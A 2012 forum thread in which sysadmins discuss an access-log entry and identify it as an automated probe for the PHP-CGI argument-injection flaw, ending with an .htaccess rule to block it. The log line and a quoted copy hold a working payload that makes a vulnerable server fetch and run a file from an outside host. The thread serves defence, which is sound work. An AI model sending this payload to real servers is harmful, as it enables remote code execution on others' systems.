attack or webcrawler?

matty204359 · 06-09-2012, 05:09 PM

209.135.33.180 - - [09/Jun/2012:07:45:11 -0400] "POST /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://84.20.17.144/sites/api.gif%20-n HTTP/1.1" 200 4129

what is the nature of this request?

leslie.jones · 06-10-2012, 11:43 AM

Why would a legitimate crawler POST ?

Looks like a bot testing for file inclusion vulnerabilities by linking to a gif on a Spanish server

Code:

/?-d allow_url_include=On+-d auto_prepend_file=http://84.20.17.144/sites/api.gif -n/?-d allow_url_include=On+-d auto_prepend_file=http://84.20.17.144/sites/api.gif -n

kerigan · 07-09-2012, 06:52 AM

I have also seen this in my access log file on my private webserver. Except the originating IP address was 174.123.131.34. Apparently coming from a web-account hosted by theplanet.com. I wonder if anyone else has seen this as well?

leslie.jones · 07-09-2012, 10:50 AM

It appears to relate to this PHP bug/vuln:

http://eindbazen.net/2012/05/php-cgi...cve-2012-1823/

This article

http://blog.sucuri.net/2012/05/php-c...-the-wild.html

suggests that:

Quote:

The PHP guys are recommending the following .htaccess hack to block those attacks:

Code:

    RewriteEngine on
    RewriteCond %{QUERY_STRING} ^[^=]*$
    RewriteCond %{QUERY_STRING} %2d|\- [NC]
    RewriteRule .? – [F,L]

]

If you don't use PHP-CGI, it's a non issue and part of the usual trash of reconnaissance a sysadmin gets to see in the logs.

kerigan · 07-13-2012, 08:08 PM

Thank you for the information. I wasn't aware of this bug.